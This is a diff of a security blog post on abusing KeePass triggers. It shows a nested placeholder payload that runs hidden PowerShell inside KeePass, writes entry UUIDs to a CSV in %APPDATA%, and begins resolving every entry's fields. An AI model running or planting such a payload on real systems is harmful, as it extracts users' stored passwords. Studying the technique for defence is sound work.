d3lb3/d3lb3.github.io/_posts/2023-03-15-keepass-triggers.md

 # third execution..
 ```

-Because this code will be executed inside a trigger condition, it needs to be inserted in a placeholder too:
+This code is meant to be executed inside a trigger condition, so it must be inserted in a placeholder first:

 ```
 {CMD:&PowerShell.exe -C "$uid='{REF:I@I:0{CMD:/PowerShell.exe -C "$eus='';if (!(Test-Path $env:APPDATA'\extract.csv')){ni -itemType File -Path $env:APPDATA -Name 'extract.csv' | Out-Null;};foreach($line in gc $env:APPDATA'\extract.csv'){$eus+=' -'+$line.Split(',')[0];}echo $eus;"/M=C,W:0,O:1,WS=H/}}';echo $uid;if(!($uid.StartsWith('{REF'))){ac -Path $env:APPDATA'\extract.csv' -Value $uid -NoNewline;}"&M=C,W:0,O:1,WS=H&}
 ```

-> Because we insert a {CMD} placeholder inside another one, a custom separator (here '&') must be defined.
+> Because we insert a {CMD} placeholder inside a {CMD}, a custom separator (here '&') must be defined.
 {: .prompt-tip }

 ### Resolving every entry

 Each time a new UUID is resolved, we use it to determine every entry of the corresponding field.

-Because we cannot store the UUID in a variable,  we need to get the UUID from file each time using `@(Get-Content -Path $env:APPDATA'\extract.csv')[-1]`.
-We insert it in a `{CMD}` placeholder, itself in a `{REF}`  (this time with exact match):
+Because we cannot store the UUID in a variable, we need to get the UUID from the file each time using `@(Get-Content -Path $env:APPDATA'\extract.csv')[-1]`.
+We insert this command in a `{CMD}` placeholder, itself in a `{REF}`.
+We have exact match on UUIDs now, so there is no need to use the exclusion search:

 ```powershell
 # resolve entries